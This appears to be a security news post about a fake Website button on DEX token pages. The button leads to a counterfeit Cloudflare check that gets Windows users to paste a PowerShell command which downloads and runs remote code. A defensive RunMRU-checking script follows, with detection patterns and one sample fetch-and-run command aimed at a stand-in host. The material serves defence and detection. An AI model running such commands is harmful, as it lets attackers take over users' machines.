A malicious Website button found on DEX platforms
Researchers from Scam Sniffer reported a dangerous attack targeting users of decentralized exchanges. On token information pages, such as the one for FUCKLAUNCH, a fake Website button was found that leads to a malicious domain. Clicking the link opens a page that imitates a Cloudflare verification check. Instead of the usual verification, however, the victim is shown instructions to execute a dangerous PowerShell command.
On Windows devices, a message appears prompting the user to press Windows + R, paste the copied text, and confirm the input. In reality, the user is executing a PowerShell script that downloads and runs code from an external site. This gives the attackers direct access to the computer, allowing them to steal data or install malware.
On macOS devices, nothing happens: users see a normal page. This is done deliberately to hide the attack from analysts and reduce the likelihood of detection.
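For the Windows + R step described above, responders can check whether a user actually pasted such a command: Windows keeps the Run dialog history in the current user's RunMRU registry key. The following is an added example, not code from Scam Sniffer or the original report; the function names, the match patterns and the sample entries are assumptions constructed for illustration.

```powershell
# Added defensive example: flag Run-dialog history entries that start a
# script host and also fetch or execute remote content.
$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Heuristic patterns (assumptions; tune them for your environment).
$HostPattern  = '\b(powershell|pwsh|mshta|cmd)(\.exe)?\b'
$FetchPattern = 'https?://|\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|' +
                'downloadstring|downloadfile|\bcurl\b|\biex\b|invoke-expression'

function Test-SuspiciousRunEntry {
    param([Parameter(Mandatory)][string]$CommandLine)
    # RunMRU values end with the marker "\1"; strip it before matching.
    $clean = $CommandLine -replace '\\1$', ''
    return ($clean -match $HostPattern) -and ($clean -match $FetchPattern)
}

function Get-SuspiciousRunMru {
    param([string]$Path = $RunMruPath)
    if (-not (Test-Path $Path)) { return }   # key is absent until Run is first used
    $props = Get-ItemProperty -Path $Path
    foreach ($p in $props.PSObject.Properties) {
        # History slots are single letters (a, b, c, ...); skip MRUList and
        # the PS* properties added by the registry provider.
        if ($p.Name -notmatch '^[a-z]$') { continue }
        $value = [string]$p.Value
        if (Test-SuspiciousRunEntry -CommandLine $value) {
            [pscustomobject]@{
                Slot    = $p.Name
                Command = ($value -replace '\\1$', '')
            }
        }
    }
}

# Constructed sample entries (not taken from the report) to show the matching.
$samples = @(
    'notepad\1',
    'cmd\1',
    'powershell -c "iex (irm https://example.invalid/x)"\1'
)
foreach ($s in $samples) {
    '{0,-5} {1}' -f (Test-SuspiciousRunEntry -CommandLine $s), $s
}

# Entries from the live registry of the current user.
Get-SuspiciousRunMru | Format-List
```

An empty result does not rule out execution, because the Run history can be cleared or disabled; treat a hit as a lead to confirm against process-creation and PowerShell logs.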